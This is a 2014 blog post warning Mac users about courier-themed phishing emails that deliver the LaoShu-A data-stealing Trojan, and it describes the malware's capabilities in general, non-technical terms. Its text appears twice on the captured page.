If you are one of those Mac users who still believes that you can’t get infected by viruses, malware, or anything else, then you need to pay attention to this.
The idea is surprisingly simple: you receive an email that claims to be a courier company that is having trouble delivering your article.
In the email is a link to, or an attachment containing, what purports to be a tracking note for the item.
You are invited to review the relevant document and respond so that delivery can be completed.
Except that the document isn’t a document at all. It’s a Trojan that downloads malicious code depending on what OS you’re running:
If you are on a mobile device, the server delivers an error message.
If you are using a desktop browser that isn’t Safari, you receive a ZIP file containing a Windows program detected by Sophos Anti-Virus asMal/VBCheMan-C, a vague relative of the Zbot or Zeus malware.
But if you are using Safari, you receive Mac malware, delivered as an Application bundle packaged inside a ZIP file.
Lovely. The Mac Trojan is particularly nasty one called LaoShu-A:
LaoShu-A as good as hands control of your Mac over to the attackers, but its primary functions appear to be more closely associated with data stealing than with co-opting you into a traditional money-making botnet.
(You will often hear the term RAT, or Remote Access Trojan, rather than the more common term bot, used to describe this sort of malware.)
In other words, the attackers seem more concerned with digging around on your computer for what they can steal than with abusing your computer and your internet connection to aid and abet other cybercriminal activities.
Amongst other things, LaoShu-A contains code to:
- Search for files with extensions such as DOC, DOCX, XLS, XLSX, PPT and PPTX.
- ZIP those files.
- Upload (exfiltrate) them to a server operated by the attackers.
However, this RAT also knows how to:
- Download new files.
- Run arbitrary shell commands.
For example, during our tests, LaoShu-A downloaded a second application that took a screenshot with OS X’s built-in screencapture command, and tried to exfiltrate the image it had just grabbed.
Now the undelivered package delivery e-mail is not new. I have Apple Mail set to auto delete these e-mails by default. And yes, Windows users are at risk here. But Mac users are at greater risk as what’s delivered to the Mac is extremely dangerous. Thus you should be on the lookout for e-mails like these and avoid them at all costs. You’ll thank me for it.
Like this:
Like Loading...
Related
This entry was posted on January 21, 2014 at 9:44 am and is filed under Commentary with tags Apple, Security. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
Dangerous Trojan For Mac Makes The Rounds
If you are one of those Mac users who still believes that you can’t get infected by viruses, malware, or anything else, then you need to pay attention to this.
The idea is surprisingly simple: you receive an email that claims to be a courier company that is having trouble delivering your article.
In the email is a link to, or an attachment containing, what purports to be a tracking note for the item.
You are invited to review the relevant document and respond so that delivery can be completed.
Except that the document isn’t a document at all. It’s a Trojan that downloads malicious code depending on what OS you’re running:
If you are on a mobile device, the server delivers an error message.
If you are using a desktop browser that isn’t Safari, you receive a ZIP file containing a Windows program detected by Sophos Anti-Virus asMal/VBCheMan-C, a vague relative of the Zbot or Zeus malware.
But if you are using Safari, you receive Mac malware, delivered as an Application bundle packaged inside a ZIP file.
Lovely. The Mac Trojan is particularly nasty one called LaoShu-A:
LaoShu-A as good as hands control of your Mac over to the attackers, but its primary functions appear to be more closely associated with data stealing than with co-opting you into a traditional money-making botnet.
(You will often hear the term RAT, or Remote Access Trojan, rather than the more common term bot, used to describe this sort of malware.)
In other words, the attackers seem more concerned with digging around on your computer for what they can steal than with abusing your computer and your internet connection to aid and abet other cybercriminal activities.
Amongst other things, LaoShu-A contains code to:
However, this RAT also knows how to:
For example, during our tests, LaoShu-A downloaded a second application that took a screenshot with OS X’s built-in screencapture command, and tried to exfiltrate the image it had just grabbed.
Now the undelivered package delivery e-mail is not new. I have Apple Mail set to auto delete these e-mails by default. And yes, Windows users are at risk here. But Mac users are at greater risk as what’s delivered to the Mac is extremely dangerous. Thus you should be on the lookout for e-mails like these and avoid them at all costs. You’ll thank me for it.
Share this:
Like this:
Related
This entry was posted on January 21, 2014 at 9:44 am and is filed under Commentary with tags Apple, Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.